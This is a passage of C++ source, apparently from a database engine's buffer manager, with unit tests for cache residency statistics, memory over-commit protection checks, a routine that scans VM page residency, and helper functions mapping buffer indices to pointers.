CHECK( statsBFCacheResidency.cbfCacheLast == 75000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 45000, 50000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusRestore );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
}
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsResidencyIncreaseMultiple )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// Reset to a full cache
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 80%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 80000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 79%, red event
CHECK( statsBFCacheResidency.cbfResidentLast == 100000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 79000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Reduce residency to 70%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 70000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 68%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 68000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 49%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 49000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 48%, red event
CHECK( statsBFCacheResidency.cbfResidentLast == 79000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 48000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Reduce residency to 38%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 38000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 28%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 28000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 18%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 18000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 17%, red event
CHECK( statsBFCacheResidency.cbfResidentLast == 48000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 400000000LL, 17000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Reduce residency to 0%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 400000000LL, 0, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Increase residency to 60%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 400000000LL, 60000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Increase residency to 80%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 400000000LL, 80000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Increase residency to 84%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 400000000LL, 84000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Increase residency to 85%, green event, above normal threshold
CHECK( statsBFCacheResidency.cbfResidentLast == 17000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 500000000LL, 85000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusRestore );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Increase residency to 100%, no event because we are already above threshold
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 500000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 80%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 500000000LL, 80000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 79%, red event
CHECK( statsBFCacheResidency.cbfResidentLast == 85000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 600000000LL, 79000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Reduce residency to 84%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 600000000LL, 84000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 49%, no event (last was at 79%)
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 600000000LL, 49000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 48%, red event
CHECK( statsBFCacheResidency.cbfResidentLast == 79000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 700000000LL, 48000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Increase residency to 85%, green event, above normal threshold
CHECK( statsBFCacheResidency.cbfResidentLast == 48000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 800000000LL, 85000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusRestore );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Increase residency to 84%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 800000000LL, 84000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Increase residency to 100%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 800000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 80%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 800000000LL, 80000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 100%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 800000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 79%, red event
CHECK( statsBFCacheResidency.cbfResidentLast == 85000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 900000000LL, 79000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Increase residency to 84%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 900000000LL, 84000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Increase residency to 79%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 900000000LL, 79000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Increase residency to 84%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 900000000LL, 84000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
}
static QWORD g_qwUnintendedResidentPagesLastPass = 0;
static QWORD g_cbfUnintendedResidentPagesLastPass = 0;
static QWORD g_cbfHighUnintendedResidentPagesLastPass = 0;
static QWORD g_qwUnintendedResidentPagesEver = 0;
static TICK g_tickLastUpdateStatistics = 0;
// determines if memory in-depth protection should terminate the process.
BOOL FBFITriggerCacheOverMemoryInDepthProtection(
const __int64 cbTotalPhysicalMemory,
const __int64 cbCommittedCacheSize )
{
//
// implement over-commit defense.
// how it works:
// o trigger protection if our committed cache size is >= pctCommitDefenseRAM % of RAM.
Expected( cbTotalPhysicalMemory > 0 );
Expected( cbCommittedCacheSize >= 0 );
const BOOL fOverCommitRAM = ( cbTotalPhysicalMemory == 0 ) || ( 100 * cbCommittedCacheSize / cbTotalPhysicalMemory >= pctCommitDefenseRAM );
return fOverCommitRAM;
}
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, TestFBFITriggerCacheOverMemoryInDepthProtection )
{
const __int64 cbTotalPhysicalMemory = 32000000000i64;
const __int64 cbCommittedCacheSizeOver = cbTotalPhysicalMemory * ( pctCommitDefenseRAM ) / 100;
const __int64 cbCommittedCacheSizeOk = cbCommittedCacheSizeOver - 1;
// self-check.
CHECK( cbTotalPhysicalMemory <= cbCommittedCacheSizeOver );
CHECK( cbCommittedCacheSizeOk < cbCommittedCacheSizeOver );
// only two simple cases.
CHECK( !FBFITriggerCacheOverMemoryInDepthProtection( cbTotalPhysicalMemory, cbCommittedCacheSizeOk ) );
CHECK( FBFITriggerCacheOverMemoryInDepthProtection( cbTotalPhysicalMemory, cbCommittedCacheSizeOver ) );
}
#endif // ENABLE_JET_UNIT_TEST
BOOL FBFICommittedCacheSizeOverTargetDefense(
const __int64 cbCommittedCacheSize,
const __int64 cbCommitCacheTarget )
{
Expected( cbCommittedCacheSize >= 0 );
Expected( cbCommitCacheTarget >= 0 );
C_ASSERT( cbCommitDefenseMin > 0 );
// zero is special because it is when the buffer manager is shutting down so in that case,
// never consider it to be over committed.
if ( cbCommitCacheTarget <= 0 )
{
Assert( cbCommitCacheTarget == 0 ); // had better not be negative
return fFalse;
}
// we don't want to be too agressive for small targets because the amount of committed memory
// might still be too large, so give ourselves some extra room before we deem it over-committed,
// by max'ing in cbCommitDefenseMin.
const __int64 cbCommitCacheTargetT = max( cbCommitCacheTarget, cbCommitDefenseMin );
const BOOL fOverCommitTarget = ( 100 * cbCommittedCacheSize / cbCommitCacheTargetT >= pctCommitDefenseTarget );
return fOverCommitTarget;
}
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, TestFBFICommittedCacheSizeOverTargetDefense )
{
const __int64 cbCommitCacheTargetNominal = cbCommitDefenseMin;
const __int64 cbCommitCacheTargetSmall = cbCommitCacheTargetNominal / 2;
const __int64 cbCommittedCacheSizeOver = cbCommitCacheTargetNominal * pctCommitDefenseTarget / 100;
const __int64 cbCommittedCacheSizeOk = cbCommittedCacheSizeOver - 1;
// self-check.
CHECK( cbCommitCacheTargetSmall < cbCommitCacheTargetNominal );
CHECK( cbCommitCacheTargetNominal < cbCommittedCacheSizeOver );
CHECK( cbCommittedCacheSizeOk < cbCommittedCacheSizeOver );
CHECK( ( 100 * cbCommittedCacheSizeOk / cbCommitCacheTargetSmall ) > pctCommitDefenseTarget );
// nominal target
CHECK( !FBFICommittedCacheSizeOverTargetDefense( cbCommittedCacheSizeOk, cbCommitCacheTargetNominal ) );
CHECK( FBFICommittedCacheSizeOverTargetDefense( cbCommittedCacheSizeOver, cbCommitCacheTargetNominal ) );
// small target
CHECK( !FBFICommittedCacheSizeOverTargetDefense( cbCommittedCacheSizeOk, cbCommitCacheTargetSmall ) );
CHECK( FBFICommittedCacheSizeOverTargetDefense( cbCommittedCacheSizeOver, cbCommitCacheTargetSmall ) );
// zeroed target is always considered not over target
CHECK( !FBFICommittedCacheSizeOverTargetDefense( cbCommittedCacheSizeOk, 0 ) );
CHECK( !FBFICommittedCacheSizeOverTargetDefense( cbCommittedCacheSizeOver, 0 ) );
// zeroed cache size should never be considered over target
CHECK( !FBFICommittedCacheSizeOverTargetDefense( 0, cbCommitCacheTargetNominal ) );
CHECK( !FBFICommittedCacheSizeOverTargetDefense( 0, cbCommitCacheTargetSmall ) );
CHECK( !FBFICommittedCacheSizeOverTargetDefense( 0, 0 ) );
}
#endif // ENABLE_JET_UNIT_TEST
BOOL FBFITriggerCacheOverTargetInDepthProtection(
const __int64 cbCommittedCacheSize,
const __int64 cbCommitCacheTarget,
const TICK dtickCacheSizeDuration )
{
//
// implement slow-shrink defense.
// how it works:
// o if cache resizing has been running for longer than a certain threshold,
// trigger protection if our committed cache size is >= pctCommitDefenseTarget % of target.
Expected( dtickCacheSizeDuration >= 0 );
const BOOL fOverCommitTarget = FBFICommittedCacheSizeOverTargetDefense( cbCommittedCacheSize, cbCommitCacheTarget );
if ( !fOverCommitTarget )
{
return fFalse;
}
const BOOL fTriggerOverCommmitDefense = ( dtickCacheSizeDuration >= dtickCommitDefenseTarget );
return fTriggerOverCommmitDefense;
}
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, TestFBFITriggerCacheOverTargetInDepthProtection )
{
const __int64 cbCommitCacheTargetNominal = cbCommitDefenseMin;
const __int64 cbCommitCacheTargetSmall = cbCommitCacheTargetNominal / 2;
const __int64 cbCommittedCacheSizeOver = cbCommitCacheTargetNominal * pctCommitDefenseTarget / 100;
const __int64 cbCommittedCacheSizeOk = cbCommittedCacheSizeOver - 1;
const TICK dtickCacheSizeDurationOver = dtickCommitDefenseTarget;
const TICK dtickCacheSizeDurationOk = dtickCacheSizeDurationOver - 1;
// self-check.
CHECK( cbCommitCacheTargetSmall < cbCommitCacheTargetNominal );
CHECK( cbCommitCacheTargetNominal < cbCommittedCacheSizeOver );
CHECK( cbCommittedCacheSizeOk < cbCommittedCacheSizeOver );
CHECK( dtickCacheSizeDurationOk < dtickCacheSizeDurationOver );
CHECK( ( 100 * cbCommittedCacheSizeOk / cbCommitCacheTargetSmall ) > pctCommitDefenseTarget );
// nominal target
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOk, cbCommitCacheTargetNominal, dtickCacheSizeDurationOk ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOver, cbCommitCacheTargetNominal, dtickCacheSizeDurationOk ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOk, cbCommitCacheTargetNominal, dtickCacheSizeDurationOver ) );
CHECK( FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOver, cbCommitCacheTargetNominal, dtickCacheSizeDurationOver ) );
// small target
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOk, cbCommitCacheTargetSmall, dtickCacheSizeDurationOk ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOver, cbCommitCacheTargetSmall, dtickCacheSizeDurationOk ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOk, cbCommitCacheTargetSmall, dtickCacheSizeDurationOver ) );
CHECK( FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOver, cbCommitCacheTargetSmall, dtickCacheSizeDurationOver ) );
// zeroed target is always permitted
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOk, 0, dtickCacheSizeDurationOk ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOver, 0, dtickCacheSizeDurationOk ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOk, 0, dtickCacheSizeDurationOver ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOver, 0, dtickCacheSizeDurationOver ) );
// zeroed cache size should never trigger protection
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( 0, cbCommitCacheTargetNominal, dtickCacheSizeDurationOver ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( 0, cbCommitCacheTargetSmall, dtickCacheSizeDurationOver ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( 0, 0, dtickCacheSizeDurationOver ) );
}
#endif // ENABLE_JET_UNIT_TEST
ERR ErrBFICacheUpdateStatistics()
{
ERR err = JET_errSuccess;
DWORD cUpdate = 0;
IBitmapAPI* pbmapi = NULL;
size_t cmmpgResident = 0;
size_t cmmpgNonResident = 0;
size_t cmmpgNewNonResident = 0;
LONG ibfMax = 0;
LONG ibfLastTrimmed = -1;
LONG cbfCacheAddressableAfter = -1;
LONG cbfInitAfter = -1;
LONG cbfNewlyCommittedAfter = -1;
const TICK tickStartUpdateStats = TickOSTimeCurrent();
Unused( tickStartUpdateStats );
// memory over-commit protection.
const __int64 cbTotalPhysicalMemory = (__int64)OSMemoryQuotaTotal();
const __int64 cbCommittedCacheSize = CbBFICacheIMemoryCommitted();
const __int64 cbCommitCacheTarget = g_cacheram.GetOptimalResourcePoolSize();
const TICK dtickCacheSizeDuration = DtickBFIMaintCacheSizeDuration();
// do not enforce over-memory protection if the committed cache size is within acceptable range compared to target.
if ( FBFICommittedCacheSizeOverTargetDefense( cbCommittedCacheSize, cbCommitCacheTarget ) )
{
EnforceSz( !FBFITriggerCacheOverMemoryInDepthProtection( cbTotalPhysicalMemory, cbCommittedCacheSize ), "CacheWayOverPhysMem" );
}
#ifndef ESENT
// ESENT clients are more diverse w.r.t. cache sizes and buffer cache usage, so
// disable over-target protection in this case.
if ( FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSize, cbCommitCacheTarget, dtickCacheSizeDuration ) )
{
FireWall( "CacheOverTargetTooLong" );
AssertSz( fFalse, "Defense-in-depth protection for committed cache (%I64d) vs. target size (%I64d).", cbCommittedCacheSize, cbCommitCacheTarget );
}
#endif // !ESENT
// reset residency statistics.
g_qwUnintendedResidentPagesLastPass = 0;
g_cbfUnintendedResidentPagesLastPass = 0;
g_cbfHighUnintendedResidentPagesLastPass = 0;
// Note: we deref newly committed, because these pages are apart of the cache size, but are not resident ...
const LONG cbfCacheAddressableBefore = (LONG)cbfCacheAddressable;
const LONG cbfNewlyCommittedBefore = (LONG)g_cbfNewlyCommitted;
const LONG cbfInitBefore = *(volatile LONG *)(&cbfInit);
OnDebug( CStats * phistoIcbBuffer = new CPerfectHistogramStats() );
// compute the max cache size we'll need for small caches
const size_t cbVMPage = OSMemoryPageCommitGranularity();
const size_t cbfVMPage = max( 1, cbVMPage / g_rgcbPageSize[g_icbCacheMax] );
const size_t cmmpgBF = max( 1, g_rgcbPageSize[g_icbCacheMax] / cbVMPage );
const LONG_PTR cpgMax = min( cbfInitBefore, g_cpgChunk );
// get our page residence data from the system
size_t cbMax = roundup( cpgMax * g_rgcbPageSize[g_icbCacheMax], OSMemoryPageCommitGranularity() ); // for 2KB pages
Call( ErrOSMemoryPageResidenceMapScanStart( cbMax, &cUpdate ) );
// there has been a change in the page residence data
if ( cUpdate != g_cResidenceCalc )
{
// note this change in our residence data
g_cResidenceCalc = cUpdate;
// compute the parameters required to walk the cache by VM page
size_t cbitVMPage;
for ( cbitVMPage = 0; (size_t)1 << cbitVMPage != cbVMPage; cbitVMPage++ );
Expected( cbitVMPage == 12 || cbitVMPage == 13 ); // 4KB (x86/amd64) or 8KB (ia64)
IBF ibfLastUnintendedResident = 0;
// walk every VM page in the cache by each chunk
for ( size_t iCacheChunk = 0, ibf = 0; ibf < (size_t)cbfInitBefore && iCacheChunk < cCacheChunkMax; iCacheChunk++ )
{
// get our page residence data for this chunk from the system
Assert( cpgMax == g_cpgChunk || iCacheChunk == 0 ); // only a small / one chunk cache should have a cpgMax less g_cpgChunk
cbMax = roundup( cpgMax * g_rgcbPageSize[g_icbCacheMax], OSMemoryPageCommitGranularity() ); // for 2KB pages
Call( ErrOSMemoryPageResidenceMapRetrieve( g_rgpvChunk[ iCacheChunk ], cbMax, &pbmapi ) );
// Note: Processing the last chunk retrieves more than necessary, but since it's
// all reserved it's and we check ibf < cbfInitBefore it's technically OK, just a
// little inefficient.
size_t immpgBF = 0;
for ( size_t iVMPage = 0; ibf < (size_t)cbfInitBefore && iVMPage < ( cbMax / OSMemoryPageCommitGranularity() ); iVMPage++ )
{
BOOL fResident = fTrue;
IBitmapAPI::ERR errBM = IBitmapAPI::ERR::errSuccess;
// determine if this VM page is resident. when in doubt, claim
// that it is resident
errBM = pbmapi->ErrGet( iVMPage, &fResident );
if ( errBM != IBitmapAPI::ERR::errSuccess )
{
fResident = fTrue;
}
// this VM page is not resident
if ( !fResident )
{
cmmpgNonResident++;
// mark every resident BF that uses this VM page as not
// resident
for ( IBF ibfT = ibf; ibfT < cbfInitBefore && ibfT < IBF( ibf + cbfVMPage ); ibfT++ )
{
const PBF pbf = PbfBFICacheIbf( ibfT );
if ( cmmpgBF >= 2 )
{
Assert( ibfT == (LONG_PTR)ibf ); // should be only one ibf
// since this buffer can have multiple VM pages, and the buffer may not be the full size, we
// can not count a non-resident page past the end of the buffer against such a buffer.
if ( ( cbVMPage * ( immpgBF + 1 ) ) <= (size_t)g_rgcbPageSize[pbf->icbBuffer] )
{
// this looks like it is decrementing per VM page, but it is not, b/c the first
// VM page to trigger this code path, will set the bfrs to bfrsNotResident, and then
// we will short circuit this code and not decrement g_cbfCacheResident there after.
(void)BfrsBFIUpdateResidentState( pbf, bfrsNotResident, bfrsResident );
}
}
else
{
if ( bfrsResident == BfrsBFIUpdateResidentState( pbf, bfrsNotResident, bfrsResident ) )
{
cmmpgNewNonResident++;
}
}
}
// update statistics / perf counters
if ( (IBF)ibf != ibfLastTrimmed )
{
// not really safe to use PinstFromIfmp( pbf->ifmp ), pbf->tce, so we'll make this a
// global counter.
PERFOpt( AtomicIncrement( (LONG*)&g_cbfTrimmed ) );
}
ibfLastTrimmed = ibf;
}
else
{
cmmpgResident++;
#ifndef RTM
// this actually may be quite expensive fetching all these random BFs
if ( cmmpgBF >= 2 )
{
const PBF pbf = PbfBFICacheIbf( ibf );
const ICBPage icbBuffer = (ICBPage)pbf->icbBuffer;
#ifdef DEBUG
if ( phistoIcbBuffer )
{
phistoIcbBuffer->ErrAddSample( (SAMPLE) icbBuffer );
}
#endif
if ( ( cbVMPage * ( immpgBF + 1 ) ) > (size_t)g_rgcbPageSize[icbBuffer] )
{
// Unfortunately due to no locking and timing / overlap of page dehydration, this can hit, but
// we would not expect it to hit very often.
// we can not count all pages, because shrink is very aggressive and when pages are dirty, they will
// be rehydrated, and then dehydrated in quick succession to satisfy shrink. In such an environment
// we can blow our quota below of 10k or less pages unintentionally resident. So we now exclude
// unintentionally resident pages if they're over the cache size, as this should be a temporary
// condition, and once shrink completes it de-commits or resets all pages over the cache size.
if ( ibf > (size_t)cbfCacheAddressable )
{
g_cbfHighUnintendedResidentPagesLastPass++;
}
else
{
g_qwUnintendedResidentPagesLastPass++;
g_qwUnintendedResidentPagesEver++;
if ( (IBF)ibf != ibfLastUnintendedResident )
{
g_cbfUnintendedResidentPagesLastPass++;
ibfLastUnintendedResident = (IBF)ibf;
}
}
}
}
#endif
} // if !resident / else resident ...
// advance our current BF pointer as we walk VM pages
if ( ++immpgBF >= cmmpgBF )
{
immpgBF = 0;
ibf += cbfVMPage;
ibfMax = ibf;
}
}
} // for each cache chunk
} // update id is diff from current update id
g_tickLastUpdateStatistics = TickOSTimeCurrent();
// used for tracing only.
cbfCacheAddressableAfter = (LONG)cbfCacheAddressable;
cbfNewlyCommittedAfter = (LONG)g_cbfNewlyCommitted;
cbfInitAfter = (LONG)cbfInit;
HandleError:
OSMemoryPageResidenceMapScanStop();
const TICK tickFinishUpdateStats = TickOSTimeCurrent();
Unused( tickFinishUpdateStats );
// We think it would be hard to dehydrate 10k buffers in the time it takes for us to process the residence map.
Assert( g_qwUnintendedResidentPagesLastPass < 10000 );
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "ErrBFICacheUpdateStatistics() -> %d completed in %d ms, g_qwUnintendedResidentPagesLastPass = %d, b: %d, %d, %d, a: %d, %d, %d ... res-stats: %d, %d, %d ... %d",
err,
DtickDelta( tickStartUpdateStats, g_tickLastUpdateStatistics ),
(ULONG)g_qwUnintendedResidentPagesLastPass,
cbfCacheAddressableBefore, cbfNewlyCommittedBefore, cbfInitBefore,
cbfCacheAddressableAfter, cbfNewlyCommittedAfter, cbfInitAfter,
(ULONG)cmmpgResident, (ULONG)cmmpgNonResident, (ULONG)cmmpgNewNonResident,
ibfMax ) );
BFIReportCacheStatisticsChanges(
&g_statsBFCacheResidency,
UtilGetCurrentFileTime(),
(INT)g_cbfCacheResident,
(INT)CbfBFICacheCommitted(),
cbCommittedCacheSize,
cbCommitCacheTarget,
cbTotalPhysicalMemory );
OnDebug( delete phistoIcbBuffer );
return err;
}
// returns the cache clean percentage
LONG LBFICacheCleanPercentage( void )
{
return ( LONG )( 100 * g_cbfCacheClean / max( 1, cbfCacheSize ) );
}
// returns the cache size percentage of maximum allowed size
LONG LBFICacheSizePercentage( void )
{
return ( LONG )( 100 * cbfCacheSize / max( 1, cbfCacheTarget ) );
}
// returns the cache pinned buffer percentage
LONG LBFICachePinnedPercentage( void )
{
BFSTAT bfStat = BFLogHistogram::Read();
Assert( bfStat.m_cBFPin <= bfStat.m_cBFMod );
return ( LONG )( 100 * bfStat.m_cBFPin / max( 1, cbfCacheSize ) );
}
// Returns the current buffer size backing the given latched page.
// NOTE: buffer size may be dehydrated and thus different than CbBFPageSize().
INLINE LONG CbBFIBufferSize( const PBF pbf )
{
Assert( pbf->sxwl.FLatched() );
return g_rgcbPageSize[pbf->icbBuffer];
}
// Returns the page size of the given latched page.
INLINE LONG CbBFIPageSize( const PBF pbf )
{
Assert( pbf->sxwl.FLatched() );
return g_rgcbPageSize[pbf->icbPage];
}
#ifdef DEBUG
// returns fTrue if the specified page pointer is valid
INLINE BOOL FBFICacheValidPv( const void* const pv )
{
if ( BoolParam( JET_paramEnableViewCache ) )
{
return pv != NULL;
}
else
{
return IpgBFICachePv( pv ) != ipgNil;
}
}
// returns fTrue if the specified BF pointer is valid
INLINE BOOL FBFICacheValidPbf( const PBF pbf )
{
return IbfBFICachePbf( pbf ) != ibfNil;
}
#endif // DEBUG
// returns the PBF associated with the given IBF
INLINE PBF PbfBFICacheIbf( const IBF ibf )
{
return ( ibf == ibfNil ?
pbfNil :
g_rgpbfChunk[ ibf / g_cbfChunk ] + ibf % g_cbfChunk );
}
// returns the page pointer associated with the given IPG
INLINE void* PvBFICacheIpg( const IPG ipg )
{
if ( BoolParam( JET_paramEnableViewCache ) )
{
// Ergh, went off in accept in ESE _internal_ unit test
//ExpectedSz( fFalse, "This wouldn't return a valid answer in ViewCache, and I don't think it is used there." );
// though I don't understand why we can't index off the rgbf and get it that way...
return NULL;
}
else
{
// We use g_icbCacheMax because we need to be able to handle a maximum size page
return ( ipg == ipgNil ?
NULL :
(BYTE*)g_rgpvChunk[ ipg / g_cpgChunk ] + ( ipg % g_cpgChunk ) * g_rgcbPageSize[g_icbCacheMax] );
}
}
// returns the IBF associated with the given PBF
IBF IbfBFICachePbf( const PBF pbf )
{
// scan the PBF chunk table looking for a chunk that fits in this range
LONG_PTR ibfChunk;
for ( ibfChunk = 0; ibfChunk < cCacheChunkMax; ibfChunk++ )
{
// our PBF is part of this chunk and is aligned properly
if ( g_rgpbfChunk[ ibfChunk ] &&
g_rgpbfChunk[ ibfChunk ] <= pbf && pbf < g_rgpbfChunk[ ibfChunk ] + g_cbfChunk &&
( DWORD_PTR( pbf ) - DWORD_PTR( g_rgpbfChunk[ ibfChunk ] ) ) % sizeof( BF ) == 0 )
{
// compute the IBF for this PBF
const IBF ibf = ibfChunk * g_cbfChunk + pbf - g_rgpbfChunk[ ibfChunk ];
Assert( PbfBFICacheIbf( ibf ) == pbf );
return ibf;
}
}
// our PBF isn't part of any chunk so return nil
return ibfNil;
}
// returns the IPG associated with the given page pointer
IPG IpgBFICachePv( const void* const pv )
{
// this may possibly not work b/c of the different mapping methods ... would need to check
// the rgbf[ipg].bfat == bfatFracCommit before returning to be perfectly safe.
Expected( !UlParam( JET_paramEnableViewCache ) );
// scan the page chunk table looking for a chunk that fits in this range
LONG_PTR ipgChunk;
for ( ipgChunk = 0; ipgChunk < cCacheChunkMax; ipgChunk++ )
{
// our page pointer is part of this chunk and is aligned properly
if ( g_rgpvChunk[ ipgChunk ] &&
g_rgpvChunk[ ipgChunk ] <= pv &&
pv < (BYTE*)g_rgpvChunk[ ipgChunk ] + g_cpgChunk * g_rgcbPageSize[g_icbCacheMax] &&
( DWORD_PTR( pv ) - DWORD_PTR( g_rgpvChunk[ ipgChunk ] ) ) % g_rgcbPageSize[g_icbCacheMax] == 0 )
{
// compute the IPG for this page pointer
const IPG ipg = ipgChunk * g_cpgChunk + ( (BYTE*)pv - (BYTE*)g_rgpvChunk[ ipgChunk ] ) / g_rgcbPageSize[g_icbCacheMax];
Assert( PvBFICacheIpg( ipg ) == pv );
return ipg;
}
}
// our page pointer isn't part of any chunk so return nil
return ipgNil;
}
// returns whether the alloc type is consistent with the set pv pointer
BOOL FBFIValidPvAllocType( const BF * const pbf )
{
